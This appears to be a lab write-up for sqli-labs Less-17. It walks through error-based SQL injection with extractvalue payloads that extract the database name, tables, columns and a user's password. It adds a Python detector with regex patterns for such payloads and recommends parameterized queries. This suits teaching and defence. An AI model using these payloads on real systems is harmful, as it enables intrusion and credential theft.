Topic tested: error-based injection
This article uses extractvalue for the injection.
For the principle and technique, see [Network Security] sqli-labs Less-5 Detailed Analysis of Problem Solving.
Determine the type of injection
As can be seen from the echoed response, the injection type is single-quote injection.
Find the database name
Enter admin as the account.
Enter the following as the password:
1' and (extractvalue(1,concat(0x5c,database(),0x5c)))#
The database name is security.
Find the table names
Enter admin as the account.
Enter the following as the password:
1' and (extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c)))#
The response echoes four tables.
Find the column names
Enter admin as the account.
Enter the following as the password:
1' and (extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x5c)))#
This returns three columns.
Retrieve the data
Enter admin as the account.
Enter the following as the password:
1' and (extractvalue(1,concat(0x5c,(select password from (select password from users where username='admin1') b) ,0x5c)))#
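For the defending side, the password values used in the steps above share a recognisable shape: a quote break-out, an XPath function call wrapping concat with a hex delimiter, and a trailing comment. The following is an added example, not code from the original post or from sqli-labs, that checks a submitted form field for that shape; the function and signal names, the inclusion of updatexml, and the encoded and benign samples are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signal names are this example's own. updatexml is not on the page: it is
# included as an assumption, being MySQL's other XPath function.
SIGNALS = {
    "xpath_error_function": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "concat_hex_delimiter": re.compile(r"\bconcat(_ws)?\s*\(\s*0x[0-9a-f]+", re.I),
    "information_schema": re.compile(r"\binformation_schema\s*\.\s*\w+", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
    "quote_breakout": re.compile(r"'\s*(and|or)\b", re.I),
    "trailing_comment": re.compile(r"(#|--)\s*$"),
}

def normalize(value: str) -> str:
    """Undo up to two layers of URL encoding and collapse whitespace."""
    for _ in range(2):
        value = unquote_plus(value)
    return re.sub(r"\s+", " ", value).strip()

def signals(value: str) -> list[str]:
    """Names of all signals present in one submitted field value."""
    text = normalize(value)
    return [name for name, rx in SIGNALS.items() if rx.search(text)]

def is_error_based_sqli(value: str) -> bool:
    """Flag only when an XPath function call is combined with another signal,
    so a password that merely ends in '#' or mentions the word is not flagged."""
    hits = signals(value)
    return "xpath_error_function" in hits and len(hits) >= 2

# The four password values shown on this page.
PAGE_PAYLOADS = [
    "1' and (extractvalue(1,concat(0x5c,database(),0x5c)))#",
    "1' and (extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c)))#",
    "1' and (extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x5c)))#",
    "1' and (extractvalue(1,concat(0x5c,(select password from (select password from users where username='admin1') b) ,0x5c)))#",
]
# Constructed samples: the first payload as it would look URL-encoded in a raw
# POST body, and benign passwords that must not be flagged.
ENCODED = "1%27+and+(extractvalue(1,concat(0x5c,database(),0x5c)))%23"
BENIGN = ["Tr0ub4dor&3#", "it's and more", "extractvalue() docs"]

if __name__ == "__main__":
    for v in PAGE_PAYLOADS + [ENCODED] + BENIGN:
        print(is_error_based_sqli(v), signals(v), v[:60])
```

A check like this belongs in request logging or alerting; the fix for the flaw itself is a parameterized query and not echoing database errors to the client.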
Summary
The above is a detailed analysis of [Network Security] sqli-labs Less-17 problem solving; the detailed analysis of [Network Security] sqli-labs Less-18 problem solving will be shared later.
I am Qiu said, see you next time.